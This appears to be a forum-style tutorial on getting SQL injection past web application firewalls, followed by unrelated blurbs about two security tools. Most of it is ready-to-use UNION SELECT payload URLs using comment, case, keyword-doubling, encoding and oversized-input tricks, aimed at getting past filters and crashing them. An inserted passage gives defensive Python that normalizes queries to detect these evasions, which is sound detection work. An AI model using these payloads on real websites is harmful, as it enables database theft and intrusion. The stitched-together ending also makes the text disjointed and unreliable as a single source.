Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get a 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)
2) Change the Case of the Letters:
You can also change the Case of the Command:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!
4) Keyword Removal:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can exploit this behaviour as follows:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
(You can test whether the WAF can be crashed by typing:
Code:
?page_id=null/**//*!50000UnIOn*//*yoyu*/all/**//*!SeLEct*//*nnaa*/+1,2,3,4....
)
2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from “UNION SELECT”, other commands might be blocked as well.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
--- | ---
@@version | version()
concat() | concat_ws() (difference between concat() and concat_ws(): http://is.gd/VEeiDU)
group_concat() | concat_ws()
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union (select 1,2,3,4...)
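From the defender's side, here is an added example (not code from the original post) of how a filter should treat the evasions listed above: decode and normalize the request the way MySQL will read it (versioned comments executed, plain comments treated as whitespace, case folded, parentheses dropped), and also inspect what a single-pass "delete the keyword" or "delete the *" filter would leave behind, since those single-pass filters are exactly what the UNIunionON and uni*on tricks above defeat. The sample query strings are constructed for this example; the `page_id` parameter is taken from the post's own URLs.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings: one per evasion listed on the page, plus two benign ones.
SAMPLES = [
    "page_id=-15 UNION SELECT 1,2,3,4",
    "page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "page_id=-15 uNIoN sELecT 1,2,3,4",
    "page_id=-15 UNIunionON SELselectECT 1,2,3,4",
    "page_id=-15 UnION/**/SElecT 1,2,3,4",
    "page_id=null/**//*!50000UnIOn*//*yoyu*/all/**//*!SeLEct*//*nnaa*/+1,2,3,4",
    "page_id=-15+uni*on+sel*ect+1,2,3,4",
    "page_id=-15+(uNioN)+(sElECt)+1,2,3,4",
    "page_id=%2D15%20%55NION%20%53ELECT%201,2,3,4",
    "page_id=15",
    "page_id=15&q=reunion%20selection",
]

VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body of /*!...*/
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)            # /**/ and /*yoyu*/ are whitespace to MySQL
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")
KEYWORDS = ("union", "select")

def normalize(raw, rounds=3):
    """Reduce a query string to roughly what the database would see."""
    s = raw
    for _ in range(rounds):                   # undo URL encoding, including double encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = VERSIONED_COMMENT.sub(r"\1", s)
    s = PLAIN_COMMENT.sub(" ", s)
    s = s.replace("(", "").replace(")", "")   # (uNioN)+(sElECt) is still UNION SELECT
    return re.sub(r"\s+", " ", s).strip().lower()

def naive_sanitizer_outputs(s):
    """What each single-pass 'delete the bad token' filter from the page would leave behind."""
    yield s.replace("*", "")                  # filter that strips '*': uni*on -> union
    for k in KEYWORDS:
        s = s.replace(k, "")                  # filter that strips each keyword once
    yield s                                   # UNIunionON SELselectECT -> union select

def is_union_select(query):
    """Flag if the normalized query, or what a naive filter turns it into, contains UNION SELECT."""
    n = normalize(query)
    return any(UNION_SELECT.search(c) for c in (n, *naive_sanitizer_outputs(n)))

def flag_samples(samples=SAMPLES):
    return [(q, is_union_select(q)) for q in samples]
```

The point of `naive_sanitizer_outputs` is that a filter which deletes tokens and then passes the rest through is itself the vulnerability; the safe choice is to reject (or log) a request whose normalized form matches, never to rewrite it.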
The Network Security Toolkit (NST) is a bootable ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed open source network security applications and should run on most x86/x86_64 platforms.
Server Analyser is a service for detecting and analyzing web-based threats. It currently handles shells, obfuscated JavaScript, Executables, Iframes and port scans.